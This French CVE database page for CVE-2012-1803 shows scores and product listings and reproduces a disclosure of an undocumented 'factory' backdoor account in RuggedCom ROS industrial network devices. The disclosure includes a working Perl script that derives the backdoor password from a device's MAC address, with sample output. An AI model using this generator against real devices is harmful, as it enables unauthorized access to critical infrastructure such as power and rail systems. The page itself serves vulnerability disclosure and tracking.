CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
RuggedCom Rugged Operating System (ROS) 3.10.x and earlier has a factory account with a password derived from the MAC Address field in the banner, which makes it easier for remote attackers to obtain access by performing a calculation on this address value, and then establishing a (1) TELNET, (2) remote shell (aka rsh), or (3) serial-console session.
Category : Cryptographic Issues Weaknesses in this category are related to the design and implementation of data confidentiality and integrity. Frequently these deal with the use of encoding techniques, encryption libraries, and hashing algorithms. The weaknesses in this category could lead to a degradation of the quality data if they are not addressed.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
8.5
AV:N/AC:M/Au:S/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
26.05%
–
–
2022-04-03
–
–
26.05%
–
–
2023-03-12
–
–
–
0.83%
–
2023-04-16
–
–
–
0.83%
–
2023-11-26
–
–
–
0.69%
–
2024-01-28
–
–
–
0.98%
–
2024-02-11
–
–
–
0.98%
–
2024-06-02
–
–
–
0.72%
–
2024-10-27
–
–
–
0.86%
–
2024-12-22
–
–
–
1.42%
–
2025-02-23
–
–
–
1.42%
–
2025-01-19
–
–
–
1.42%
–
2025-02-23
–
–
–
1.42%
–
2025-03-18
–
–
–
–
61.25%
2025-03-18
–
–
–
–
61.25,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2012-04-23 22h00 +00:00 Auteur : jc EDB Vérifié : No
Title: Undocumented Backdoor Access to RuggedCom Devices
Author: jc
Organization: JC CREW
Date: April 23, 2012
CVE: CVE-2012-1803
Background:
RuggedCom is one of a handful of networking vendors who capitalize on
the market for "Industrial Strength" and "Hardened" networking
equipment. You'll find their gear installed in traffic control
systems, railroad communications systems, power plants, electrical
substations, and even US military sites. Beyond simple L2 and L3
networking these devices are also used for serial-to-ip converstion in
SCADA systems and they even support modbus and dnp3. RuggedCom
published a handy guide to some of their larger customers at
www.ruggedcom.com/about/customers/. My favorite quote is from a
contractor who installed RuggedCom equipment at a US Air Force base:
"Reliability was not an option." How unfortunately apropos.
Problem:
An undocumented backdoor account exists within all released versions
of RuggedCom's Rugged Operating System (ROS®). The username for the
account, which cannot be disabled, is "factory" and its password is
dynamically generated based on the device's MAC address. Multiple
attempts have been made in the past 12 months to have this backdoor
removed and customers notified.
Exploit:
#!/usr/bin/perl
if (! defined $ARGV[0]) {
print "+========================================== \n";
print "+ RuggedCom ROS Backdoor Password Generator \n";
print "+ JC CREW April 23 2012 \n";
print "+ Usage:\n$0 macaddress \n";
print "+========================================== \n";
exit; }
$a = $ARGV[0];
$a =~ s/[^A-F0-9]+//simg;
@b = reverse split /(\S{2})/,$a;
$c = join "", @b;
$c .= "0000";
$d = hex($c) % 999999929;
print "$d\n";
Example usage:
Given a RuggedCom device with MAC address 00-0A-DC-00-00-00, run some
perl and learn that the password for "factory" is 60644375.
[jc (at) pig (dot) aids [email concealed] ros]$ ./ruggedfail.pl 00-0A-DC-00-00-00
60644375
[jc (at) pig (dot) aids [email concealed] ros]$
Shoutouts:
CERT/CC for doing great work in trying to get vendors to actually fix things.
JC CREW
Timeline:
Apr 2011 - Vendor notified directly
Jul 2011 - Vendor verbally acknowledges knowledge of backdoor,
and ceases communication.
Feb 11 2012 - US-CERT notified
Mar 12 2012 - Vendor responds to US-CERT.
Apr 06 2012 - Due to lack of further contact by vendor, CERT sets
public disclosure for April 13 2012
Apr 10 2012 - Vendor states they need another three weeks to alert
their customers, but not fix the vulnerability.
Apr 11 2012 - Clarification requested regarding need for additional three weeks.
Apr 23 2012 - No response from vendor.
Apr 23 2012 - This disclosure.
Keywords:
RuggedCom
ROS
RuggedSwitch
RuggedServer
backdoor
Products Mentioned
Configuraton 0
Siemens>>Ruggedcom_rugged_operating_system >> Version From (including) 3.2.0 To (including) 3.10.1
Siemens>>Ruggedcom_rugged_operating_system >> Version 3.2.5 (Open CPE detail)
Siemens>>Ruggedcom_rugged_operating_system >> Version 3.3.6 (Open CPE detail)
Siemens>>Ruggedcom_rugged_operating_system >> Version 3.4.9 (Open CPE detail)
Siemens>>Ruggedcom_rugged_operating_system >> Version 3.5.4 (Open CPE detail)
Siemens>>Ruggedcom_rugged_operating_system >> Version 3.6.6 (Open CPE detail)
Siemens>>Ruggedcom_rugged_operating_system >> Version 3.7.9 (Open CPE detail)
Siemens>>Ruggedcom_rugged_operating_system >> Version 3.8.5 (Open CPE detail)
Siemens>>Ruggedcom_rugged_operating_system >> Version 3.9.3 (Open CPE detail)
Siemens>>Ruggedcom_rugged_operating_system >> Version 3.10.1 (Open CPE detail)